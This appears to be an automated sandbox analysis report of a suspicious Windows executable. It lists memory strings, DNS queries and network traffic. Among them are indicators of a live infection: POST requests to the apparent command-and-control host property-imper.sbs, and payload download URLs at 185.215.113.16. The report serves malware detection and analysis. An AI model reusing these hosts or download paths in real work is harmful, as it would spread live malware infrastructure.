d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI\|\|{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: property-imper.sbs
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs

Source: file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000002.2464188669.0000000000FCA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
Source: file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_130.5.dr	String found in binary or memory: http://schema.org/Organization
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_130.5.dr, chromecache_131.5.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://aka.ms/msignite_docs_banner
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_130.5.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_130.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_130.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_130.5.dr	String found in binary or memory: https://github.com/nschonni
Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chromecache_130.5.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: file.exe, file.exe, 00000000.00000003.2202757971.0000000001311000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2358730980.00000000012FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000000.00000003.2221296992.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs/api9-
Source: file.exe, 00000000.00000002.2464239287.0000000001291000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://property-imper.sbs:443/apiicrosoft
Source: chromecache_122.5.dr	String found in binary or memory: https://schema.org
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
Source: chromecache_122.5.dr	String found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_110.5.dr, chromecache_122.5.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823

Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49811 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01304F13	0_3_01304F13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012CB14E	0_3_012CB14E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012CB14E	0_3_012CB14E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012CB14E	0_3_012CB14E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_012CB14E	0_3_012CB14E

Source: file.exe, 00000000.00000003.2308561038.0000000006191000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2309608592.000000000625B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2323053442.00000000060EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305571118.0000000005D62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316904470.00000000061F7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000002.2464239287.000000000131C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2357972834.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2309874403.00000000061A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2322237027.00000000060E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2361600016.0000000005CD4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305754805.0000000005E3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000002.2468321345.00000000060E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2311629582.00000000061BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310326260.00000000060E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2358730980.000000000131C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2356695905.0000000005CD4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2356695905.0000000005CD4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefO vs file.exe
Source: file.exe, 00000000.00000003.2310676700.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2305917129.0000000005E49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306313214.0000000005D62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2321254754.000000000622B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2304270252.0000000005E2E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2310547955.00000000061AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307305929.000000000617A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2318786320.00000000060E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2306683546.0000000005F4B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2307891269.000000000622F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2316478668.00000000060EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2319810551.0000000006341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
